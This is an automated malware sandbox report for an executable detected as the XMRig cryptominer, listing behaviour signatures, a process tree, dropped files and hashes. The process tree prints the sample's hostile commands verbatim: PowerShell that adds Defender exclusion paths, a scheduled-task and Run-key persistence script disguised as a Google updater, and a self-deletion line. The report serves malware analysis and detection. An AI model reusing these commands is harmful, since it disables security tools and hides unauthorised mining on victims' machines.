Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

11/02/2025, 16:33

250211-t2ztsstkey 10

11/02/2025, 16:33

250211-t2zh2atkex 10

11/02/2025, 16:33

250211-t2yxhatkew 10

11/02/2025, 16:33

250211-t2nrjasqdk 10

24/10/2024, 20:12

241024-yyvg5asemn 10

24/10/2024, 20:11

241024-yygk9ssemk 10

24/10/2024, 20:11

241024-yygahasemj 10

24/10/2024, 20:11

241024-yyd55sselq 10

24/10/2024, 20:08

241024-yw247asdqp 10

24/10/2024, 20:08

241024-yw1lcssdqn 10

Analysis

  • max time kernel
    900s
  • max time network
    885s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250207-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/02/2025, 16:33

General

  • Target

    grhddhsGHswgh/qM5GMXBk6hJE6Y5e (22).exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 7 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 2 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 11 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Installs/modifies Browser Helper Object 2 TTPs 8 IoCs

    BHOs are DLL modules which act as plugins for Internet Explorer.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies Internet Explorer settings 1 TTPs 24 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 32 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • System policy modification 1 TTPs 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3460
      • C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (22).exe
        "C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (22).exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious behavior: EnumeratesProcesses
        PID:2652
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2148
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1092
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:948
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:2528
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhddhsGHswgh\qM5GMXBk6hJE6Y5e (22).exe"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1144
          • C:\Windows\System32\choice.exe
            choice /C Y /N /D Y /T 3
            3⤵
              PID:2040
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:4832
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:3648
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:3592
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:5028
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PATH Win32_VideoController GET Name, VideoProcessor
              3⤵
              • Detects videocard installed
              PID:1788
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
              PID:3836
            • C:\Windows\System32\conhost.exe
              C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
              2⤵
                PID:3488
            • C:\Program Files\Google\Chrome\updater.exe
              "C:\Program Files\Google\Chrome\updater.exe"
              1⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3984
            • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
              "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QTVFQjA2N0ItMDRFOC00NTJGLTk5N0YtM0U3M0FCOUM1OEQyfSIgdXNlcmlkPSJ7NDAxMjdCODUtQTJBNC00QzBBLUExM0ItRjU1REIxREFCRTU3fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7MDM5NUQ4MkItRjNGQi00NzBCLUFDMDQtMEI2RDREQjI0NjA0fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI0IiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDU5MjEiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxODE5ODA3NzAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MzAyOTk5MzMxIi8-PC9hcHA-PC9yZXF1ZXN0Pg
              1⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              PID:2668
            • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{02FA416A-CD7D-4F10-A2D9-D092A2B90DA7}\MicrosoftEdge_X64_133.0.3065.59.exe
              "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{02FA416A-CD7D-4F10-A2D9-D092A2B90DA7}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:3528
              • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{02FA416A-CD7D-4F10-A2D9-D092A2B90DA7}\EDGEMITMP_BC948.tmp\setup.exe
                "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{02FA416A-CD7D-4F10-A2D9-D092A2B90DA7}\EDGEMITMP_BC948.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{02FA416A-CD7D-4F10-A2D9-D092A2B90DA7}\MicrosoftEdge_X64_133.0.3065.59.exe" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable
                2⤵
                • Boot or Logon Autostart Execution: Active Setup
                • Executes dropped EXE
                • Installs/modifies Browser Helper Object
                • Drops file in Program Files directory
                • Modifies Internet Explorer settings
                • Modifies registry class
                • Suspicious use of WriteProcessMemory
                • System policy modification
                PID:4972
                • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{02FA416A-CD7D-4F10-A2D9-D092A2B90DA7}\EDGEMITMP_BC948.tmp\setup.exe
                  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{02FA416A-CD7D-4F10-A2D9-D092A2B90DA7}\EDGEMITMP_BC948.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{02FA416A-CD7D-4F10-A2D9-D092A2B90DA7}\EDGEMITMP_BC948.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x228,0x22c,0x230,0x224,0x234,0x7ff64f096a68,0x7ff64f096a74,0x7ff64f096a80
                  3⤵
                  • Executes dropped EXE
                  PID:2736
                • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{02FA416A-CD7D-4F10-A2D9-D092A2B90DA7}\EDGEMITMP_BC948.tmp\setup.exe
                  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{02FA416A-CD7D-4F10-A2D9-D092A2B90DA7}\EDGEMITMP_BC948.tmp\setup.exe" --msedge --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1
                  3⤵
                  • Executes dropped EXE
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:3468
                  • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{02FA416A-CD7D-4F10-A2D9-D092A2B90DA7}\EDGEMITMP_BC948.tmp\setup.exe
                    "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{02FA416A-CD7D-4F10-A2D9-D092A2B90DA7}\EDGEMITMP_BC948.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{02FA416A-CD7D-4F10-A2D9-D092A2B90DA7}\EDGEMITMP_BC948.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x228,0x22c,0x230,0x224,0x234,0x7ff64f096a68,0x7ff64f096a74,0x7ff64f096a80
                    4⤵
                    • Executes dropped EXE
                    PID:2244
                • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --register-package-identity --verbose-logging --system-level
                  3⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:712
                  • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x228,0x22c,0x230,0x224,0x234,0x7ff778b36a68,0x7ff778b36a74,0x7ff778b36a80
                    4⤵
                    • Executes dropped EXE
                    PID:3988
                • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --remove-deprecated-packages --verbose-logging --system-level
                  3⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  • Suspicious use of WriteProcessMemory
                  PID:3296
                  • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff778b36a68,0x7ff778b36a74,0x7ff778b36a80
                    4⤵
                    • Executes dropped EXE
                    PID:1792
                • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --msedge --channel=stable --update-game-assist-package --verbose-logging --system-level
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:2088
                  • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff778b36a68,0x7ff778b36a74,0x7ff778b36a80
                    4⤵
                    • Executes dropped EXE
                    PID:4456
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k AppReadiness -p -s AppReadiness
              1⤵
                PID:2040

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{02FA416A-CD7D-4F10-A2D9-D092A2B90DA7}\EDGEMITMP_BC948.tmp\setup.exe

                Filesize

                6.8MB

                MD5

                1b3e9c59f9c7a134ec630ada1eb76a39

                SHA1

                a7e831d392e99f3d37847dcc561dd2e017065439

                SHA256

                ce78ccfb0c9cdb06ea61116bc57e50690650b6b5cf37c1aebfb30c19458ee4ae

                SHA512

                c0e50410dc92d80ff7bc854907774fc551564e078a8d38ca6421f15cea50282c25efac4f357b52b066c4371f9b8d4900fa8122dd80ab06ecbd851c6e049f7a3e

              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                Filesize

                3.9MB

                MD5

                ad5f7dc7ca3e67dce70c0a89c04519e0

                SHA1

                a10b03234627ca8f3f8034cd5637cda1b8246d83

                SHA256

                663fe0f4e090583e6aa5204b9a80b7a76f677259066e56a7345aebc6bc3e7d31

                SHA512

                ad5490e9865caa454c47ec2e96364b9c566b553e64801da60c295acd570017747be1aff6f22ca6c20c6eee6f6d05a058af72569fd6e656f66e48010978c7fd51

              • C:\Program Files\Google\Chrome\updater.exe

                Filesize

                2.0MB

                MD5

                a16a669a09bf158058b83e04e69fe38e

                SHA1

                f6c94763850d9e590d86057139e8895a7aacdeea

                SHA256

                cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

                SHA512

                658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

              • C:\Program Files\Google\Libs\g.log

                Filesize

                226B

                MD5

                fdba80d4081c28c65e32fff246dc46cb

                SHA1

                74f809dedd1fc46a3a63ac9904c80f0b817b3686

                SHA256

                b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

                SHA512

                b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

              • C:\Program Files\msedge_installer.log

                Filesize

                72KB

                MD5

                60221508bd86b8aed17b908c7cbde679

                SHA1

                912cafd8b636f292f93f0100742f7062638f2bcf

                SHA256

                7367b7824db5cfdbd2a8baf69cd0dd82767da7b390f047f0321d556cf7ac35c4

                SHA512

                70ec63a3707d36cfd97019c615182e805670194ce706171c92a99b78c62273c46361544c602695cf74d990e972ec7e1e93e5444140ab317bf4ebac66c521cb39

              • C:\Program Files\msedge_installer.log

                Filesize

                97KB

                MD5

                1b744636b01054767ff6a2a60afcaef0

                SHA1

                e66f67c71585cf033a24901e55b58e2f3f4bd58a

                SHA256

                b7c8d814684fb1342dc5999f56eca3d282697710bc4ce60de7196a450a24225d

                SHA512

                e02872365e597f47bb22114360dd66bae2ceeabd4661f6f2c99d93e62bd2d21cda9b5127a3727cb1646a2f598c4111b433a52c72e1562af5a045ef0d4a0e20c1

              • C:\Program Files\msedge_installer.log

                Filesize

                98KB

                MD5

                fa748c4adaa740574afe3bff260204c5

                SHA1

                2ff0d7f62c3fd2ddac3c3054ca110839b63824cb

                SHA256

                d55d978a33901693c6b4540a0778bf965c4cde8f7297811e2a07d1c6248c9bd4

                SHA512

                b975d93ec4aa33aff20ec7fb95fc7cf62de2c8ad2bc2b203cd3fc5f066e14644cf4fccc5629b73087f71230106ff4d2099cca793bde35e1520fe29302f41a0ee

              • C:\Program Files\msedge_installer.log

                Filesize

                103KB

                MD5

                6258f22f5329f4749bb48cbeae62c561

                SHA1

                3c88eea9f3a54a2c46ece62b0cecc490da4cb9fd

                SHA256

                585370e509133e9ba169fcb17f584dec6c01dc3368adcbc0f7fd39915a5fec4d

                SHA512

                6888df4581048ffa5822132a05bca996f40f9f329c9c94db01df46e54e3532f7846180827b9acb69628e5814d665580d7c0538adb3a49b18ce0414f6fefa09cb

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                Filesize

                2KB

                MD5

                d85ba6ff808d9e5444a4b369f5bc2730

                SHA1

                31aa9d96590fff6981b315e0b391b575e4c0804a

                SHA256

                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                SHA512

                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                77d622bb1a5b250869a3238b9bc1402b

                SHA1

                d47f4003c2554b9dfc4c16f22460b331886b191b

                SHA256

                f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                SHA512

                d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                2f5787ae4922a2629ad7dbc2fac017b9

                SHA1

                6fbc49c480378329a20a57abcb11486b37351186

                SHA256

                9b218b1fdaf204a77b67cabac229d576ff4a987f34e45f823609f6f0649edf33

                SHA512

                21896af380ac3c371270621f398a7d729e5cefbf11124bf76a2c237c67de9ebccf6a7af9fbf3b2259e3ea59735f23c8ff8521c40996ad2b67b2c1dbfcbb780cd

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rlokmwz0.pwk.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                Filesize

                4KB

                MD5

                bdb25c22d14ec917e30faf353826c5de

                SHA1

                6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                SHA256

                e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                SHA512

                b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                b42c70c1dbf0d1d477ec86902db9e986

                SHA1

                1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                SHA256

                8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                SHA512

                57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

              • memory/1092-32-0x00007FFF1DE20000-0x00007FFF1E8E1000-memory.dmp

                Filesize

                10.8MB

              • memory/1092-30-0x00007FFF1DE20000-0x00007FFF1E8E1000-memory.dmp

                Filesize

                10.8MB

              • memory/1092-29-0x00007FFF1DE20000-0x00007FFF1E8E1000-memory.dmp

                Filesize

                10.8MB

              • memory/1092-18-0x00007FFF1DE20000-0x00007FFF1E8E1000-memory.dmp

                Filesize

                10.8MB

              • memory/2148-16-0x00007FFF1DE20000-0x00007FFF1E8E1000-memory.dmp

                Filesize

                10.8MB

              • memory/2148-13-0x00007FFF1DE20000-0x00007FFF1E8E1000-memory.dmp

                Filesize

                10.8MB

              • memory/2148-12-0x00007FFF1DE20000-0x00007FFF1E8E1000-memory.dmp

                Filesize

                10.8MB

              • memory/2148-2-0x00000206C6C20000-0x00000206C6C42000-memory.dmp

                Filesize

                136KB

              • memory/2148-1-0x00007FFF1DE23000-0x00007FFF1DE25000-memory.dmp

                Filesize

                8KB

              • memory/2652-34-0x00007FF6D3540000-0x00007FF6D3751000-memory.dmp

                Filesize

                2.1MB

              • memory/2652-0-0x00007FF6D3540000-0x00007FF6D3751000-memory.dmp

                Filesize

                2.1MB

              • memory/3488-142-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-138-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-166-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

              • memory/3488-104-0x00007FF7A2C60000-0x00007FF7A3454000-memory.dmp

                Filesize

                8.0MB

